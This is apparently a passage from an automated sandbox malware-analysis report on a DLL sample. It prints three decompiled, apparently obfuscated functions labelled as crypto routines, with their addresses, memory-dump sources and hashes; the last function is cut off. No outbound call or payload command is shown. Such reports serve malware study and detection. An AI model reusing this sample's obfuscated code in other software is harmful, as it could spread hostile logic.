                                • Instruction Fuzzy Hash: 6BE1C772A14EAD86F710CF16E8405A57BB5FB58799F268032DA4C63360DF3CE521C714
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E1520 Relevance: .3, Instructions: 330COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 98%
                                			E00007FFC7FFC130E1520(intOrPtr __eax, long long __rbx, signed int __rdx, void* __r8, void* __r9, long long _a8, intOrPtr _a16, signed int _a24, signed long long _a32, signed long long _a40, signed int _a48, signed long long _a56, intOrPtr _a72, intOrPtr _a80) {
				signed int _t220;
				signed int _t222;
				signed char _t248;
				signed char _t268;
				intOrPtr _t296;
				signed long long _t298;
				intOrPtr _t300;
				signed long long _t302;
				signed long long _t304;
				signed long long _t307;
				intOrPtr _t309;
				intOrPtr _t310;
				intOrPtr _t313;
				signed long long _t316;
				signed long long _t317;
				signed long long _t319;
				intOrPtr _t321;
				signed long long _t322;
				intOrPtr _t323;
				signed long long _t324;
				signed long long _t328;
				signed long long _t330;
				signed long long _t333;
				intOrPtr _t334;
				signed long long _t341;
				signed long long _t345;
				intOrPtr _t350;
				intOrPtr _t353;
				signed long long _t354;
				signed long long _t359;
				intOrPtr* _t363;
				unsigned long long _t365;
				signed int _t368;
				long long _t370;
				signed long long _t373;
				signed long long _t379;
				signed long long _t381;
				void* _t382;
				signed long long _t383;
				signed long long _t384;
				signed long long _t389;
				signed long long _t390;
				intOrPtr _t393;
				intOrPtr* _t394;

				_a8 = __rbx;
				 *0x13124168 =  *0x13124168 + 1;
				_t383 =  *0x131241a0; // 0x0
				_t368 =  *0x13124124;
				_t333 = _a56;
				_t384 = _t383 + 1;
				_t394 = _a48;
				_t393 = _a80;
				_a16 = __eax;
				_a24 =  *0x13124130 & 0x0000ffff;
				_t296 =  *0x13124138; // 0x0
				 *0x131241a0 = _t384;
				 *0x13124194 =  *0x13124194 + 1;
				_t359 =  *(_t394 + 0x7f50) |  *0x13124180;
				_t298 =  *(_t296 + 0xc410) ^ 0x000016b3;
				_a32 = _t298;
				_a48 =  *(_t333 + 0x1505) & 0x000000ff;
				 *0x13124198 = _t298;
				 *(_t393 + _t384 * 8) = __rdx * 0x12f6;
				_t379 =  *0x131241a0; // 0x0
				_t370 =  *0x13124158; // 0x0
				_t300 =  *0x13124188; // 0x0
				r10d =  *0x13124132 & 0x000000ff;
				 *0x131241a0 = _t379 - 1;
				 *0x13124190 =  *0x13124190 & 0x0000ffff &  *(_t300 + _t384 * 4);
				 *0x13124158 = _t370 - 1;
				_t302 =  *0x13124140; // 0x0
				 *0x131241a0 = _t359;
				_t381 = _t359;
				_t334 = _a72;
				if (( *(_t333 + 0xeac) & 0x000000ff) -  *((intOrPtr*)(_t302 + 0x7864)) <= 0) goto 0x130e16b5;
				 *(__r8 +  *0x13124148 * 8) =  *(__r8 +  *0x13124148 * 8) ^ ( *0x13124148 - 0x00000ef1 | _t302);
				_t304 =  *0x131241a0; // 0x0
				 *0x13124132 = ( *0x13124132 & 0x000000ff) * (( *(_t368 +  *0x13124148 * 8) & 0x000000ff) +  *((intOrPtr*)(__r9 + 0x3e10)) & 0x000000ff);
				 *(__r8 + (_t304 + _t304) * 8) =  *(__r8 + (_t304 + _t304) * 8) ^ 0x00000001;
				goto 0x130e180e;
				if (0xc20 % _a48 - 0x10cd > 0) goto 0x130e175a;
				r12d = 0xffff;
				 *((intOrPtr*)(_t334 +  *0x13124148 * 2)) =  *((intOrPtr*)(_t334 +  *0x13124148 * 2)) + ( *(_t368 + _t381 * 4) & 0x0000ffff) +  *0x13124150 - 0x2cf;
				 *0x13124150 =  *0x13124150 - 1;
				_t341 =  *0x131241a0; // 0x0
				 *0x1312416c = 0x141c;
				 *0x13124130 = ( *0x13124130 & 0x0000ffff) + r12w;
				_t307 =  *0x13124128; // 0x0
				 *((short*)(0x646 + _t341 * 4)) = _t307 / (_t341 + _t341);
				goto 0x130e1819;
				_t309 =  *0x13124178; // 0x0
				_t373 =  *0x13124198; // 0x0
				if (( *0x13124132 & 0x000000ff) ==  *((intOrPtr*)(_t309 + __rdx * 2))) goto 0x130e1784;
				if (_t309 == _t373) goto 0x130e17a3;
				_t310 =  *0x13124138; // 0x0
				if ( *((intOrPtr*)(_t394 +  *0x13124148 * 8)) ==  *((intOrPtr*)(_t310 + 0xea38))) goto 0x130e1ac0;
				 *(__r9 + _t384 * 8) =  *0x13124124 *  *0x13124180;
				_t363 =  *0x13124124 +  *0x13124160;
				 *_t363 = (sil & 0xffffffff) * 0x3d -  *_t363;
				_t313 =  *0x13124140; // 0x0
				 *((intOrPtr*)(_t313 +  *0x13124124 * 4)) = 0x7ff;
				 *(_t393 + __rdx * 8) =  *(_t393 + __rdx * 8) *  *(_t393 + 0x4858);
				_t389 = __rdx + 1;
				 *(_t334 + 0x14 + _t389 * 4) =  *(_t334 + 0x14 + _t389 * 4) &  *0x13124122 & 0x000000ff;
				r12d = 0xffff;
				 *0x13124148 =  *0x13124148 + 1;
				_t390 = _t389 + 1;
				_t316 = _a40;
				r8d = 0x79f;
				 *0x13124132 =  *(_t316 + _t390 * 4) - (((0x939fd7a3 *  *(_t316 + _t390 * 4) >> 0x20) +  *(_t316 + _t390 * 4) >> 0xc) + ((0x939fd7a3 *  *(_t316 + _t390 * 4) >> 0x20) +  *(_t316 + _t390 * 4) >> 0xc >> 0x1f)) * 0x1bbf;
				_t345 = _t394 + _t316 * 8;
				 *_t345 = _t363;
				_t317 =  *0x131241a8; // 0x0
				r15d = 0x7a3;
				_t365 =  *(_t394 + _t390 * 8) & _t345;
				 *(0x3d4 + _t317 * 8) = _t365;
				_t268 =  *(_t317 + _t317 + 0x63a) & 0x0000ffff;
				if (_t268 - 0x155e >= 0) goto 0x130e193a;
				r9d = _t268;
				asm("o16 nop [eax+eax]");
				_t319 =  *0x131241a0; // 0x0
				_t382 = _t381 + 1;
				 *((intOrPtr*)(_t393 + (_t365 + 0x20) * 8 + 8 - 8)) =  *((intOrPtr*)(_t393 + (_t365 + 0x20) * 8 + 8 - 8)) + (_t319 | _t381);
				_t321 =  *0x131241a8; // 0x0
				 *((char*)( *_t394 + _t321)) = 0x28;
				 *0x13124132 = ( *0x13124132 & 0x000000ff) * 0x73;
				_t248 = ( *0x1312416c & 0x0000ffff) + r12w;
				 *0x1312416c = _t248;
				 *0x13124133 =  *0x13124133 + ( *(_a32 + _t365 * 4 + 4 - 4) & 0x000000ff | _t268 | _t248);
				if (_t268 + 1 - 0x155e < 0) goto 0x130e18d0;
				_t322 =  *0x13124170; // 0x0
				 *0x13124150 =  *0x13124150 | _t322;
				 *(__r8 + 8 + (_t390 + _t390) * 8) =  *(__r8 + 8 + (_t390 + _t390) * 8) | _t322;
				r9d =  *0x13124148; // 0x0
				_t323 =  *0x13124178; // 0x0
				r8d =  *(_t323 + (_t382 + _t382) * 2) & 0x0000ffff;
				_t220 =  *0x13124124; // 0x0
				r8d = r8d ^ 0x00000877;
				_t350 =  *0x131241a8; // 0x0
				r8d = r8d + _t220 + 0xfffff332;
				 *0x13124124 = r8d;
				_t222 =  *(_t350 + 0xe81) & 0x000000ff;
				if (r10d - _t222 > 0) goto 0x130e19af;
				if (_a16 - 0xc3e <= 0) goto 0x130e1a20;
				_t324 =  *0x131241a0; // 0x0
				 *0x131241a0 = _t324 + 1;
				 *0x13124148 = _t222 /  *0x4794 * _t365 %  *0x1312414c - r9d;
				 *((intOrPtr*)(__r8 + (_t365 - (_t365 >> 7) * 0xbad) * 8)) =  *((intOrPtr*)(__r8 + (_t365 - (_t365 >> 7) * 0xbad) * 8)) + _t365 - (_t365 >> 7) * 0xbad;
				r8d =  *0x13124124; // 0x0
				_t353 =  *0x131241a8; // 0x0
				_t328 =  *0x131241a0; // 0x0
				r9d =  *0x13124132 & 0x000000ff;
				_t354 = _a56;
				 *0x131241a0 = _t328 - 1;
				if (( *(_t382 + _t353) & 0x000000ff) != ( *(_t354 + _t328 * 4) & 0x000000ff)) goto 0x130e1a96;
				r8d = r8d + 1;
				 *0x13124124 = r8d;
				_t330 =  *_t394;
				 *(__r8 + _t330 * 8) = _t354 ^ 0x00000045;
				 *0x131241a0 =  *0x131241a0 +  *((intOrPtr*)(0x1089 + _t330 * 4));
				return  *0x13124132 & 0x000000ff;
			}















































                                0x7ffc130e1520
                                0x7ffc130e152e
                                0x7ffc130e1541
                                0x7ffc130e1548
                                0x7ffc130e154b
                                0x7ffc130e1550
                                0x7ffc130e1553
                                0x7ffc130e155b
                                0x7ffc130e1563
                                0x7ffc130e156e
                                0x7ffc130e1572
                                0x7ffc130e1579
                                0x7ffc130e1587
                                0x7ffc130e1594
                                0x7ffc130e159b
                                0x7ffc130e15a1
                                0x7ffc130e15ad
                                0x7ffc130e15bf
                                0x7ffc130e15d5
                                0x7ffc130e15d9
                                0x7ffc130e15e0
                                0x7ffc130e15ea
                                0x7ffc130e15f8
                                0x7ffc130e1600
                                0x7ffc130e1610
                                0x7ffc130e1625
                                0x7ffc130e1635
                                0x7ffc130e163c
                                0x7ffc130e1643
                                0x7ffc130e164d
                                0x7ffc130e1658
                                0x7ffc130e1674
                                0x7ffc130e169b
                                0x7ffc130e16a5
                                0x7ffc130e16ab
                                0x7ffc130e16b0
                                0x7ffc130e16c8
                                0x7ffc130e16da
                                0x7ffc130e16f7
                                0x7ffc130e16fc
                                0x7ffc130e1708
                                0x7ffc130e170f
                                0x7ffc130e1723
                                0x7ffc130e1732
                                0x7ffc130e1751
                                0x7ffc130e1755
                                0x7ffc130e175a
                                0x7ffc130e1768
                                0x7ffc130e1774
                                0x7ffc130e1782
                                0x7ffc130e1784
                                0x7ffc130e179d
                                0x7ffc130e17bc
                                0x7ffc130e17c7
                                0x7ffc130e17d7
                                0x7ffc130e17d9
                                0x7ffc130e17e7
                                0x7ffc130e17fa
                                0x7ffc130e17fe
                                0x7ffc130e1808
                                0x7ffc130e180e
                                0x7ffc130e1819
                                0x7ffc130e181f
                                0x7ffc130e1822
                                0x7ffc130e1827
                                0x7ffc130e184e
                                0x7ffc130e185c
                                0x7ffc130e1868
                                0x7ffc130e186b
                                0x7ffc130e1876
                                0x7ffc130e1886
                                0x7ffc130e188d
                                0x7ffc130e189d
                                0x7ffc130e18ab
                                0x7ffc130e18b6
                                0x7ffc130e18c7
                                0x7ffc130e18d0
                                0x7ffc130e18ea
                                0x7ffc130e18ed
                                0x7ffc130e18f4
                                0x7ffc130e18fb
                                0x7ffc130e1909
                                0x7ffc130e1916
                                0x7ffc130e191a
                                0x7ffc130e192c
                                0x7ffc130e1938
                                0x7ffc130e193a
                                0x7ffc130e1944
                                0x7ffc130e1952
                                0x7ffc130e1957
                                0x7ffc130e196c
                                0x7ffc130e1973
                                0x7ffc130e1978
                                0x7ffc130e197e
                                0x7ffc130e1985
                                0x7ffc130e1991
                                0x7ffc130e1994
                                0x7ffc130e199b
                                0x7ffc130e19a5
                                0x7ffc130e19ad
                                0x7ffc130e19af
                                0x7ffc130e19bb
                                0x7ffc130e19f3
                                0x7ffc130e1a0f
                                0x7ffc130e1a12
                                0x7ffc130e1a19
                                0x7ffc130e1a20
                                0x7ffc130e1a27
                                0x7ffc130e1a34
                                0x7ffc130e1a40
                                0x7ffc130e1a49
                                0x7ffc130e1a52
                                0x7ffc130e1a55
                                0x7ffc130e1a60
                                0x7ffc130e1a63
                                0x7ffc130e1a71
                                0x7ffc130e1a95

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ca6b1c4497fa61e7931f76e937ad3dd685b13b9db48d4da50510d773187c50da
                                • Instruction ID: 7e00520255034525651c8ecc9ef81e0591c1366a189bc2f06ca13c99c8385b6a
                                • Opcode Fuzzy Hash: ca6b1c4497fa61e7931f76e937ad3dd685b13b9db48d4da50510d773187c50da
                                • Instruction Fuzzy Hash: 2FF18E72A48EA985F704CB16E8905753BB5FB68769F254132DA8DA3360DF3CF061CB24
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E42A0 Relevance: .3, Instructions: 302COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 96%
                                			E00007FFC7FFC130E42A0(intOrPtr __ecx, long long __rbx, signed int __rdx, signed int __r9) {
				signed char _t181;
				signed int _t193;
				intOrPtr _t196;
				signed int _t202;
				signed int _t208;
				signed int _t219;
				signed int _t248;
				signed char _t253;
				signed int _t255;
				signed int _t266;
				signed long long _t272;
				intOrPtr _t299;
				signed long long _t300;
				signed long long _t303;
				signed long long _t304;
				signed long long _t305;
				signed long long _t306;
				signed long long _t308;
				signed long long _t309;
				intOrPtr _t312;
				signed long long _t313;
				intOrPtr _t314;
				signed long long _t318;
				signed long long _t320;
				signed long long _t321;
				signed long long _t322;
				intOrPtr _t324;
				void* _t331;
				signed long long _t347;
				signed long long _t348;
				signed long long _t355;
				signed long long _t356;
				signed long long _t357;
				void* _t361;
				signed long long* _t362;
				signed short* _t364;
				signed long long _t367;
				intOrPtr _t371;
				signed long long _t372;
				signed long long _t377;
				signed long long _t378;
				signed long long _t379;
				signed short* _t381;
				signed long long _t385;
				signed long long _t387;
				signed long long _t392;
				void* _t396;
				signed int* _t399;
				signed int* _t401;

				 *((long long*)(_t361 + 0x18)) = __rbx;
				 *(_t361 + 0x20) = r9d;
				 *((intOrPtr*)(_t361 + 8)) = __ecx;
				_t362 = _t361 - 0x10;
				_t378 =  *0x131241a0; // 0x0
				_t364 =  *0x13124180; // 0x0
				r9d =  *0x13124148; // 0x0
				_t381 = _t364;
				_t355 =  *0x13124150; // 0x0
				r9d = r9d + 1;
				_t399 = _t362[0x12];
				_t356 = _t355 - 1;
				_t392 = _t362[0xe];
				_t396 = _t378 - _t362[0xf];
				 *0x13124180 = _t364 - 1;
				 *0x13124148 = r9d;
				r8d =  *(__r9 + __r9 * 2 + __rdx) & 0x000000ff;
				_t347 = 0x947 / r8d;
				 *0x13124150 = _t356;
				_t357 = _t356 * _t378;
				r10d = _t362[0x13] & 0x000000ff;
				_t385 =  *(_t362[0x14] + 0x385c) *  *(_t362[0x10] + 0x1fe4);
				_t181 =  *0x13124120 & 0x0000ffff;
				r8d = _t181 & 0x000000ff;
				 *0x13124120 = _t181 + 0xffff;
				_t362[0xb] = _t385;
				 *0x1312416c = 0x1a65 % ( *0x1312416c & 0x0000ffff);
				 *(_t399 + r9d * 8) =  *(_t399 + r9d * 8) ^  *0x1312414c;
				_t299 =  *0x131241a8; // 0x0
				 *_t362 = _t357;
				 *0x13124134 =  *0x13124134 & ( *(_t299 + 0x5de) & 0x000000ff) * r8d;
				 *((short*)(0x1f8a + _t392 * 2 * 2)) = 0x8dc / ( *(_t392 * 2 + 0x1f8a + _t392 * 2) & 0x0000ffff);
				_t248 =  *0x1312416c & 0x0000ffff;
				if (_t248 - ( *0x13124123 & 0x000000ff) <= 0) goto 0x130e4472;
				_t367 = _t362[0x11];
				r9d = r10b & 0xffffffff;
				_t300 =  *0x13124158; // 0x0
				 *0x13124158 = _t300 * __r9;
				_t303 = _t367 -  *0x13124170;
				 *0x13124170 = _t303;
				 *((char*)(__rdx + _t367 * 2 + _t367)) = (r10b & 0xffffffff) -  *((intOrPtr*)(__rdx + _t367 * 2 + _t367));
				 *(_t357 + 0x38 + _t303 * 8) =  *(_t357 + 0x38 + _t303 * 8) | 0x00001a24;
				if (_t248 + 1 - ( *0x13124123 & 0x000000ff) > 0) goto 0x130e4420;
				_t362[0xb] = _t385 + 1;
				_t304 =  *0x131241a0; // 0x0
				r8d =  *(_t399 + 8 + _t304 * 8);
				if (r8d - 0x200 <= 0) goto 0x130e44e8;
				asm("o16 nop [eax+eax]");
				_t305 =  *0x13124128; // 0x0
				r8d = r8d + 1;
				 *((short*)(0x189a +  *_t399 * 2)) = ( *(_t305 + 0x33b8) & 0x0000ffff) -  *((intOrPtr*)(0x189a +  *_t399 * 2)) +  *0x13124170;
				 *0x13124150 =  *0x13124150 & 0xfffff8cf;
				_t193 =  *0x1312414c; // 0x0
				_t331 = _t193 + _t193;
				 *((char*)(_t331 + __rdx)) = _t381[0xae4] & 0x000000ff;
				if (r8d - 0x200 > 0) goto 0x130e4490;
				_t196 =  *0x13124124; // 0x0
				 *0x13124124 = _t196 + 1;
				_t253 = _t381[_t305] & 0x0000ffff;
				if (_t253 == 0x1853) goto 0x130e4764;
				_t266 = _t362[0xd];
				_t387 = _t392;
				r13d = 0xb9f;
				r13d = r13d - _t266;
				_t362[0xd] = _t266 + 0x1853;
				r9d = 0x1e4a;
				_t306 =  *0x131241a0; // 0x0
				_t308 = __rdx | 0x00000297;
				 *(_t306 * 8 + _t357) = _t308;
				_t202 =  *0x13124148; // 0x0
				 *(_t202 + _t202 + _t202 + _t202 + 0x1f8a) =  *(_t202 + _t202 + _t202 + _t202 + 0x1f8a) & ( *0x13124168 & 0x0000ffff) - r9w;
				_t309 = _t308 -  *0x13124198;
				r8d =  *0x13124132 & 0x000000ff;
				 *0x13124198 = _t309;
				r8b = r8b & _t253;
				 *0x13124132 = r8b;
				r8b = r8b + 1;
				_t208 =  *0x13124134; // 0x0
				 *0x13124132 = r8b;
				 *0x13124134 = _t208 * ( *((intOrPtr*)(0x789210 + _t309 * 4)) + 0x102c);
				r13d = r13d - 1;
				 *((long long*)(_t396 + _t347 * 8)) = r13d -  *((intOrPtr*)(_t396 + _t347 * 8));
				if (r9d != _t253) goto 0x130e467e;
				_t379 =  *0x1312414c;
				 *((short*)(_t381 + _t347 * 4)) = ( *(_t396 + _t379 * 8) & 0x0000ffff | _t253) -  *((intOrPtr*)(_t381 + _t347 * 4));
				_t312 =  *0x131241a8; // 0x0
				 *(_t379 + _t312) =  *(_t379 + _t312) & 0x00000082;
				_t313 =  *0x1312414c;
				r9d = r9d + 1;
				 *((intOrPtr*)(_t362[0x10] + _t313 * 4)) = r9d -  *((intOrPtr*)(_t362[0x10] + _t313 * 4)) + _t253;
				_t314 =  *0x13124140; // 0x0
				_t272 =  *0x13124198; // 0x0
				 *(_t314 + (_t313 + _t313 * 2) * 4) =  *(_t314 + (_t313 + _t313 * 2) * 4) & _t272 + _t253 & 0x00000008;
				 *((short*)(_t381 - 2 +  *0x13124168 * 2)) = ( *_t381 & 0x0000ffff) / (__rbx + 1);
				if (r9d == _t253) goto 0x130e45f0;
				_t401 = _t362[0x12];
				r10d = _t362[0x13] & 0x000000ff;
				if ( *((intOrPtr*)(_t401 +  *0x13124148 * 8)) - _t347 > 0) goto 0x130e4743;
				if ( *((long long*)(_t396 + __rdx * 8)) == 0x15be) goto 0x130e4743;
				_t362[0xe] = _t362[0xe] - 1;
				_t318 =  *0x13124158; // 0x0
				 *(_t401 +  *_t401 * 8) =  *(_t401 +  *_t401 * 8) ^ _t318;
				 *0x13124158 =  *0x13124158 + 1;
				_t219 =  *0x13124148; // 0x0
				_t320 =  *0x131241a0; // 0x0
				 *((intOrPtr*)(_t401 + _t318 * 8 + 0x40)) =  *((intOrPtr*)(_t401 + _t318 * 8 + 0x40)) + _t219 + 0x28;
				_t348 = _t347 * _t320;
				_t321 =  *0x13124138; // 0x0
				 *((long long*)(_t321 + __rdx * 8)) = 0xffffed8a;
				_t371 =  *0x13124160; // 0x0
				 *(_t371 + _t387) =  ~( *(_t371 + _t387) & 0x000000ff) - (_t253 & 0x000000ff) * 0x1a;
				_t372 = _t362[0x14];
				asm("cdq");
				 *(_t372 + _t348 * 4) = 0x189b /  *(_t372 + _t348 * 4);
				 *((intOrPtr*)( *_t362 + (_t387 - 1) * 8)) =  *((intOrPtr*)( *_t362 + (_t387 - 1) * 8)) + _t321;
				r9d = 0x1e4a;
				if (_t253 + 1 != 0x1853) goto 0x130e4530;
				r13d = _t362[0xe];
				_t255 =  *0x1312416c & 0x0000ffff;
				_t377 = _t362[0xf];
				asm("cdq");
				r8d = _t255;
				 *((char*)(_t372 + _t377)) = (0x906 - _t255) % ( *(_t331 + _t377) & 0x000000ff);
				 *0x1312416c =  *0x1312416c + 0xffff;
				_t322 =  *0x13124140; // 0x0
				asm("cdq");
				 *(_t322 + (_t321 + _t321 * 2) * 4) = 0x134f /  *(_t322 + (_t321 + _t321 * 2) * 4);
				 *0x13124158 =  *0x13124158 +  *((intOrPtr*)(0x1bcd + (_t322 + _t322 * 2) * 8));
				 *0x131241a0 =  *0x131241a0 | _t362[0xd] * 0x0000014e;
				 *(r13d + _t377) =  *(r13d + _t377) ^ ( *0x13124170 & 0x000000ff | r10b);
				_t324 =  *0x131241a8; // 0x0
				 *((char*)(_t324 + _t348)) = 0;
				return 0x152d;
			}




















































                                0x7ffc130e42a0
                                0x7ffc130e42a5
                                0x7ffc130e42aa
                                0x7ffc130e42b9
                                0x7ffc130e42bd
                                0x7ffc130e42c7
                                0x7ffc130e42d1
                                0x7ffc130e42d8
                                0x7ffc130e42e3
                                0x7ffc130e42ea
                                0x7ffc130e42ed
                                0x7ffc130e42f5
                                0x7ffc130e42f8
                                0x7ffc130e4304
                                0x7ffc130e4307
                                0x7ffc130e430e
                                0x7ffc130e4321
                                0x7ffc130e4332
                                0x7ffc130e4363
                                0x7ffc130e436a
                                0x7ffc130e436e
                                0x7ffc130e4377
                                0x7ffc130e437a
                                0x7ffc130e4381
                                0x7ffc130e4388
                                0x7ffc130e4396
                                0x7ffc130e43a4
                                0x7ffc130e43b4
                                0x7ffc130e43b7
                                0x7ffc130e43be
                                0x7ffc130e43dd
                                0x7ffc130e43ee
                                0x7ffc130e43f7
                                0x7ffc130e4407
                                0x7ffc130e4409
                                0x7ffc130e4411
                                0x7ffc130e4420
                                0x7ffc130e442d
                                0x7ffc130e4437
                                0x7ffc130e443e
                                0x7ffc130e444d
                                0x7ffc130e4459
                                0x7ffc130e446b
                                0x7ffc130e446d
                                0x7ffc130e4472
                                0x7ffc130e4479
                                0x7ffc130e4485
                                0x7ffc130e4487
                                0x7ffc130e4490
                                0x7ffc130e449d
                                0x7ffc130e44b6
                                0x7ffc130e44be
                                0x7ffc130e44c9
                                0x7ffc130e44d1
                                0x7ffc130e44dc
                                0x7ffc130e44e6
                                0x7ffc130e44e8
                                0x7ffc130e44f0
                                0x7ffc130e44f8
                                0x7ffc130e4503
                                0x7ffc130e4509
                                0x7ffc130e450d
                                0x7ffc130e4510
                                0x7ffc130e451b
                                0x7ffc130e4524
                                0x7ffc130e4528
                                0x7ffc130e4530
                                0x7ffc130e4544
                                0x7ffc130e454e
                                0x7ffc130e4552
                                0x7ffc130e4568
                                0x7ffc130e4575
                                0x7ffc130e457c
                                0x7ffc130e4584
                                0x7ffc130e458b
                                0x7ffc130e458e
                                0x7ffc130e4599
                                0x7ffc130e45a3
                                0x7ffc130e45b2
                                0x7ffc130e45b9
                                0x7ffc130e45c2
                                0x7ffc130e45c9
                                0x7ffc130e45d7
                                0x7ffc130e45e2
                                0x7ffc130e45fd
                                0x7ffc130e4602
                                0x7ffc130e4609
                                0x7ffc130e4611
                                0x7ffc130e4621
                                0x7ffc130e4626
                                0x7ffc130e4634
                                0x7ffc130e463f
                                0x7ffc130e464d
                                0x7ffc130e465f
                                0x7ffc130e4667
                                0x7ffc130e4669
                                0x7ffc130e4675
                                0x7ffc130e4689
                                0x7ffc130e4697
                                0x7ffc130e46a0
                                0x7ffc130e46a8
                                0x7ffc130e46af
                                0x7ffc130e46b2
                                0x7ffc130e46c5
                                0x7ffc130e46df
                                0x7ffc130e46ed
                                0x7ffc130e46f1
                                0x7ffc130e46f5
                                0x7ffc130e46fc
                                0x7ffc130e4704
                                0x7ffc130e471a
                                0x7ffc130e4723
                                0x7ffc130e472b
                                0x7ffc130e4733
                                0x7ffc130e473e
                                0x7ffc130e4748
                                0x7ffc130e4754
                                0x7ffc130e475f
                                0x7ffc130e4764
                                0x7ffc130e4770
                                0x7ffc130e477c
                                0x7ffc130e477d
                                0x7ffc130e478c
                                0x7ffc130e4790
                                0x7ffc130e479f
                                0x7ffc130e47af
                                0x7ffc130e47b3
                                0x7ffc130e47c7
                                0x7ffc130e47e0
                                0x7ffc130e47ed
                                0x7ffc130e47f1
                                0x7ffc130e47f8
                                0x7ffc130e4810

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b0c341637e56212d5c0dddac194ed3042e670afe7c835065e812139a2840dfd2
                                • Instruction ID: e2ad2443a3a29f8fd4e1339d52e76f922eaf3f6aa45018259181752874a205ce
                                • Opcode Fuzzy Hash: b0c341637e56212d5c0dddac194ed3042e670afe7c835065e812139a2840dfd2
                                • Instruction Fuzzy Hash: 00E1E732658EA989F7108F1AF8402797BB5F758769F264136DA8CA3760DF3CE060C714
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130E6820 Relevance: .3, Instructions: 259COMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E00007FFC7FFC130E6820(long long __rbx, void* __rcx, void* __rdx, long long __rbp, signed int* __r9, void* __r10, void* __r11, long long __r12, signed int _a8, long long _a16, long long _a24, long long _a32, signed int _a40, signed int _a56, signed int _a64, signed int _a72) {
				void* _v40;
				signed int _v48;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int* _v96;
				signed int _v104;
				signed int _v112;
				signed int _v120;
				signed int _v128;
				signed int _v136;
				signed int _v144;
				signed int _v152;
				signed int _v160;
				signed int _v168;
				signed int _v176;
				signed int _v184;
				void* __rdi;
				void* __rsi;
				void* __r13;
				void* __r14;
				void* __r15;
				signed int _t147;
				signed int _t157;
				signed int _t162;
				signed int _t171;
				signed int _t174;
				signed int _t196;
				signed int _t206;
				signed int _t210;
				signed int _t222;
				signed int _t224;
				signed int _t234;
				signed long long _t242;
				signed int* _t245;
				void* _t259;
				void* _t260;
				signed int* _t267;
				void* _t273;
				void* _t274;
				void* _t275;

				_t271 = __r12;
				_t267 = __r9;
				_t261 = __rbp;
				_t255 = __rdx;
				_a24 = __rbx;
				_a32 = __rbp;
				r10d = __rcx - 0x1270;
				r11d = _a64;
				_t245 = __r9;
				r9d = _a72;
				_t222 = _a40 + 0x106;
				r9d = r9d + 0xffffc5a7;
				_a56 = _t222;
				r14d = __r11 - 0x2598;
				_v76 = r9d;
				_a72 = r10d;
				_v88 = r14d;
				_t206 = __rdx + 0x17e6;
				_a8 = _t206;
				r15d = __rdx + 0x495;
				_a40 = r14d;
				r13d = __r11 + 0xffd;
				_v68 = r15d;
				if (r10d - _t274 + 0x36e7 >= 0) goto 0x130e6947;
				__r9[0xa0] = 0x39c6;
				__r9[0xa1] = 0x295f;
				_t248 = __r9[0xc];
				 *((intOrPtr*)(__r9[0xc] + 0x58)) =  *((intOrPtr*)(__r9[0xc] + 0x58)) - (__r9[0x12] | 0x00001f2c);
				__r9[0xa2] = 8;
				if (__r9[0x4c] + 0x3bc - 0x27b2 < 0) goto 0x130e6931;
				_t266 = __r9[0x7e] * 0x27ae;
				if (0x27b3 - __rdx <= 0) goto 0x130e6920;
				__r9[0x28] = __r9[0x7e] * 0x27ae;
				__r9[0xa3] = 0x18;
				goto 0x130e6d33;
				_a16 = __r12;
				r8d = _t206;
				_v80 = _t206;
				if (_t206 - (r15d * r14d ^ r14d) < 0) goto 0x130e6c67;
				_t147 =  *__r9;
				_v84 = _t147;
				_t234 = _t147;
				if (_t234 != 0) goto 0x130e6c48;
				_v72 = 0x3189 + r15d * 0x2103;
				_v64 = r15d * 0xfffff6e7 & 0x00002103;
				_v60 = __r9 - 0x30d5;
				_v56 = r11d * 0x30d5;
				_v48 = (_t206 & 0x00003189) + 0x36e7;
				_t157 = __r9[0x1c];
				r8d = __r11 + 0xffd;
				r13d = __r9[0x6e];
				r9d = _t157;
				r9d = r9d & r15d;
				r11d = r11d - _a56;
				r15d = __r9[0x38];
				r11d = r11d ^ 0x000027b2;
				r14d = __r9[0x50];
				r13d = r13d ^ _t222;
				r13d = r13d & __r9[0x20];
